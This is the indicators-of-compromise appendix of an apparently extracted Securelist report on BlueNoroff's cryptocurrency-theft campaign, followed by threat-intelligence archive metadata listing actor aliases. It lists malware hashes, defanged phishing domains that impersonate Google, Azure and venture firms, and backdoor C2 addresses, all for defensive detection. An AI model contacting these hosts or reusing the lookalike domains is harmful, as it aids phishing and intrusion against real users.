Script\r\nce09cdb7979fb9099f46dd33036b9001    xivwtjab.vbs\r\nf7f4aa55a2e4f38a6a3ea5a108baedf5    vwnozphn.vbs\r\nPowershell\r\nae52b28b360428829c4fcdc14e839f19    usoclient.ps1\r\nPowershell agent(VBS-wrapped)\r\n73572519159b0c27a18dbbaf25ef1cc0  guide.vbs\r\n8ae6aa90b5f648b3911430f14c92440b  %APPDATA%\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\check.vbs\r\nae12a668dd9f254c42fcd803c7645ed1  1.vbs\r\n589f1bb4da89cfd4a2f7f3489aa426a9  %APPDATA%\\microsoft\\windows\\start menu\\programs\\startup\\guide.vbs\r\n73572519159b0c27a18dbbaf25ef1cc0  guide.vbs\r\nBackdoor\r\n1d0fc2f1a6eb2b2bfa166a613ca871f0\r\ndb91826cb9f2ad6edfed8d6bab5bef1f    users.dll, wmc.dll\r\n9c592a22acdfb750c440fda31da4996c\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 22 of 28\n\nKeylogger\r\nf29be5c7e602e529339fda35ff91bd39\r\nScreencapture malware\r\nf194e074e7d73c544eebb70e2e2785a1\r\nInjector\r\nec2b51dc1dc99165a0eb46b73c317e25    cssvc.dll\r\nd8e51f1b9f78785ed7449145b705b2e4    cfssvc.dll\r\ndd2d50d2f088ba65a3751e555e0dea71    bfcsvc.dll\r\nf5317f1c0a10a80931378d68be9a4baa    lssc.dll\r\n8727a967bbb5ebd99789f7414d147c31    sst.dll\r\ncab281b38a57524902afcb1c9c8aa5ba    bnt.dll\r\n6a2cbaea7db300925d25d9decf461d95    lmsvc.dll\r\n33a60ea8859307d3fd1a1fe884e37d2d\r\n1993ebb00cb670c6e2ca9b5f6c6375c4    sessc.dll\r\n1fb48113d015466a272e4b70c3109e06    wssc.dll\r\n33ae39569f0051d8dc153d7b4e814a67\r\n525345989e10b64cd4d0e144eb48171f\r\n724d11c2cae561225e7ed31d7517dd40    lsasvc.dll\r\n56df737f3028203db8d51ed1263160ad    ocss.dll\r\na160b36426ce77bccdd32d117eeb879b    csscv.dll\r\n8fa484d35e60b93a4128dc5de45ec0df    wmmc.dll\r\n5cc93ccc91b2849df55d89b360fbae58\r\n630ba28be4f55ea67225a3760f9e8c1f\r\nPersistence Backdoor #1\r\n2934a7a0dfaf2ebc81b1f089277129c4  Default.rdp\r\n6c97c64052dfdc457b001f84b8657435  Default.rdp\r\nbdc354506d6c018b52cb92a9d91f5f7c  Default.rdp\r\n737478dbd1f66c9edb2d6c149432be26  Default.rdp\r\n5912e271b0da85ae3327d66deabf03ed  Default.rdp\r\nd209c3da192c49cecb5a7b3d0f7154ac  Default.rdp\r\n8d8f3a0d186b275e51589a694e09e884  Default.rdp\r\n7ccf3ddbdb175fcfece9c4423acf07b6\r\n0a9b8ca2988208b876b74641c07f631e  Default.rdp\r\nPersistence Backdoor #2\r\n9b30baa7873d86f985657c3e324ac431  vsat.dll\r\nae79ea7dfa81e95015bef839c2327108  ssdp.dll\r\nca9b98f17b9e24ca3f802c04eb508103\r\n849dd9e09cc2434ee7dbdbf9e1c408b2\r\n804523ecb9f7809fc2377d03b47dba22\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 23 of 28\n\n2b7e434e52ff7480ae06ba901f8efbfd\r\n7129020312b85d5b1e760fc57b567d95\r\nea9d8b81c9f85fd142639997187b447e\r\ne80f9d2fa735d7ab3bd9e954c4fcb6d0\r\ne2ddf13340ba79b2635618e5675eea23\r\n00a145e8f67a92b01ce4d85a0ed6bd77\r\n73aed6bcf90f936f3fbcb389a133d7c8\r\nff28ec14ec926b9892c61b9bf154a910\r\n97e5c0fe8089da97665a22975e2c86de\r\nf60d7f620dc925c4e786bcf46856f4c8\r\n4fbff7f0f62b26963b56c0fc23486891\r\n4bb579d59830579be9ead9f74a55001e\r\naafc80ff2afc71b0d5abd6c8d2809e65\r\n9850b24f8d70ad957f328961170e2d40\r\n58495a2083065b36040eea288a9d5e17\r\nf1cfd14b030e6b5d75e777ace530dad9\r\n1fb25f72e4eb26b0df154de28dbff74c\r\n1b1acc7f27717905e7094f338f81db9f\r\n3776d4a24213972b54b9ed3360ac7883\r\nc93f3bb4f7b19f5eb6f736f2659c4dae\r\n9084620e0219c035d60d395be1bf4cae\r\n2e38f37a23d9f00a02098dd302fc14e2\r\nDomains\r\nabiesvc[.]com\r\nabiesvc[.]info\r\nabiesvc.jp[.]net\r\natom.publicvm[.]com\r\natt.gdrvupload[.]xyz\r\nauthenticate.azure-drive[.]com\r\nazureprotect[.]xyz\r\nbackup.163qiye[.]top\r\nbeenos[.]biz\r\nbhomes[.]cc\r\nbitcoinnews.mefound[.]com\r\nbitflyer[.]team\r\nblog.cloudsecure[.]space\r\nbuidihub[.]com\r\nchemistryworld[.]us\r\ncirclecapital[.]us\r\nclient.googleapis[.]online\r\ncloud.azure-service[.]com\r\ncloud.globalbrains[.]co\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 24 of 28\n\ncloud.jumpshare[.]vip\r\ncloud.venturelabo[.]co\r\ncloudshare.jumpshare[.]vip\r\ncoin-squad[.]co\r\ncoinbig[.]dev\r\ncoinbigex[.]com\r\ndeepmind[.]fund\r\ndekryptcap[.]digital\r\ndllhost[.]xyz:5600\r\ndoc.venturelabo[.]co\r\ndoc.youbicapital[.]cc\r\ndoconline[.]top\r\ndocs.azureword[.]com\r\ndocs.coinbigex[.]com\r\ndocs.gdriveshare[.]top\r\ndocs.goglesheet[.]com\r\ndocs.securedigitalmarkets[.]co\r\ndocstream[.]online\r\ndocument.antcapital[.]us\r\ndocument.bhomes[.]cc\r\ndocument.fastercapital[.]cc\r\ndocument.kraken-dev[.]com\r\ndocument.lundbergs[.]cc\r\ndocument.skandiafastigheter[.]cc\r\ndocumentprotect[.]live\r\ndocumentprotect[.]pro\r\ndocuments.antcapital[.]us\r\ndocuserver[.]xyz\r\ndomainhost.dynamic-dns[.]net\r\ndownload.azure-safe[.]com\r\ndownload.azure-service[.]com\r\ndownload.gdriveupload[.]site\r\ndrives.googldrive[.]xyz\r\ndrives.googlecloud[.]live\r\ndriveshare.googldrive[.]xyz\r\ndronefund[.]icu\r\ndrw[.]capital\r\neii[.]world\r\netherscan.mrslove[.]com\r\nfaq78.faqserv[.]com\r\nfastdown[.]site\r\nfastercapital[.]cc\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 25 of 28\n\nfile.venturelabo[.]co\r\nfilestream[.]download\r\nfoundico.mefound[.]com\r\ngalaxydigital[.]cc\r\ngalaxydigital[.]cloud\r\ngoogledrive[.]download\r\ngoogledrive[.]email\r\ngoogledrive[.]online\r\ngoogledrive.publicvm[.]com\r\ngoogleexplore[.]net\r\ngoogleservice[.]icu\r\ngoogleservice[.]xyz\r\ngsheet.gdocsdown[.]com\r\nhiccup[.]shop\r\ninnoenergy[.]info\r\nisosecurity[.]xyz\r\njack710[.]club\r\njumpshare[.]vip\r\nkraken-dev[.]com\r\nledgerservice.itsaol[.]com\r\nlemniscap[.]cc\r\nlundbergs[.]cc\r\nmail.gdriveupload[.]info\r\nmail.gmaildrive[.]site\r\nmail.googleupload[.]info\r\nmclland[.]com\r\nmicrostratgey[.]com\r\nmiss.outletalertsdaily[.]com\r\nmsoffice.qooqle[.]download\r\nnote.onedocshare[.]com\r\nonlinedocpage[.]org\r\npage.googledocpage[.]com\r\nproduct.onlinedoc[.]dev\r\nprotect.antcapital[.]us\r\nprotect.azure-drive[.]com\r\nprotect.venturelabo[.]co\r\nprotectoffice[.]club\r\npvset.itsaol[.]com\r\nqooqle[.]download\r\nqoqle[.]online\r\nregcnlab[.]com\r\nreit[.]live\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 26 of 28\n\nsecuredigitalmarkets[.]ca\r\nshare.bloomcloud[.]org\r\nshare.devprocloud[.]com\r\nshare.docuserver[.]xyz\r\nshare.stablemarket[.]org\r\nsharedocs[.]xyz\r\nsignverydn.sharebusiness[.]xyz\r\nsinovationventures[.]co\r\nskandiafastigheter[.]cc\r\nslot0.regcnlab[.]com\r\nsvr04.faqserv[.]com\r\ntokenhub.mefound[.]com\r\ntokentrack.mrbasic[.]com\r\ntwosigma.publicvm[.]com\r\nup.digifincx[.]com\r\nupcraft[.]io\r\nupdatepool[.]online\r\nupload.gdrives[.]best\r\nventurelabo[.]co\r\nverify.googleauth[.]pro\r\nword.azureword[.]com\r\nwww.googledocpage[.]com\r\nwww.googlesheetpage[.]org\r\nwww.onlinedocpage[.]org\r\nyoubicapital[.]cc\r\nC2 address used by backdoor\r\n118.70.116[.]154:8080\r\n163.25.24[.]44\r\n45.238.25[.]2\r\ndevstar.dnsrd[.]com\r\nfxbet.linkpc[.]net\r\nlservs.linkpc[.]net\r\nmmsreceive.linkpc[.]net\r\nmmsreceive.linkpc[.]net\r\nmsservices.hxxps443[.]org\r\nonlineshoping.publicvm[.]com\r\npalconshop.linkpc[.]net\r\npokersonic.publicvm[.]com\r\npress.linkpc[.]net\r\nrubbishshop.linkpc[.]net\r\nrubbishshop.publicvm[.]com\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 27 of 28\n\nsocins.publicvm[.]com\r\nvpsfree.linkpc[.]net\r\nUpdate: the domain cdn.discordapp.com was removed from the IOCs section because it is used by a legitimate\r\nservice/application.\r\nSource: https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nhttps://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/\r\nPage 28 of 28", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/" ], "report_names": [ "105488" ], "threat_actors": [ { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0", "created_at": "2022-10-25T15:50:23.240383Z", "updated_at": "2026-04-10T02:00:05.299433Z", "deleted_at": null, "main_name": "APT38", "aliases": [ "APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM" ], "source_name": "MITRE:APT38", "tools": [ "ECCENTRICBANDWAGON", "HOPLIGHT", "Mimikatz", "KillDisk", "DarkComet" ], "source_id": "MITRE", "reports": null }, { "id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd", "created_at": "2022-10-25T16:07:23.766784Z", "updated_at": "2026-04-10T02:00:04.7432Z", "deleted_at": null, "main_name": "Bluenoroff", "aliases": [ "APT 38", "ATK 117", "Alluring Pisces", "Black Alicanto", "Bluenoroff", "CTG-6459", "Copernicium", "G0082", "Nickel Gladstone", "Sapphire Sleet", "Selective Pisces", "Stardust Chollima", "T-APT-15", "TA444", "TAG-71", "TEMP.Hermit" ], "source_name": "ETDA:Bluenoroff", "tools": [], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434598, "ts_updated_at": 1775826767, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/03059c470bc4fbb0a1e94f1a3e9b995e0b7c0a5f.pdf", "text": "https://archive.orkl.eu/03059c470bc4fbb0a1e94f1a3e9b995e0b7c0a5f.txt", "img": "https://archive.orkl.eu/03059c470bc4fbb0a1e94f1a3e9b995e0b7c0a5f.jpg" } }